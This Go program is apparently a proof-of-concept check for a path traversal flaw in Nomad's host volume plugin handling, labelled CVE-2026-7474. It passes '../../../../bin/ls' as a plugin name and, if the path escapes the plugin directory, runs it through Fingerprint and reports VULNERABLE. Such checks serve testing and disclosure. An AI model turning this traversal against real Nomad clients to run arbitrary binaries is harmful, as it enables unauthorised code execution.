package main

import (
	"context"
	"fmt"
	"os"
	"strings"

	"github.com/hashicorp/go-hclog"
	"github.com/hashicorp/nomad/client/hostvolumemanager"
)

func main() {
	log := hclog.NewNullLogger()
	pluginDir, _ := os.MkdirTemp("", "cve20267474-*")
	defer os.RemoveAll(pluginDir)

	traversalPayload := "../../../../bin/ls"
	p, err := hostvolumemanager.NewHostVolumePluginExternal(log, pluginDir, traversalPayload, "/tmp/vols", "")
	if err != nil {
		fmt.Printf("BLOCKED: %v\n", err)
		os.Exit(0)
	}

	if !strings.HasPrefix(p.Executable, pluginDir) {
		fmt.Printf("VULNERABLE: executable escaped to %s\n", p.Executable)
		_, err = p.Fingerprint(context.Background())
		fmt.Printf("Fingerprint error (proves execution): %v\n", err)
		os.Exit(1)
	}

	fmt.Println("UNEXPECTED: no escape detected")
	os.Exit(2)
}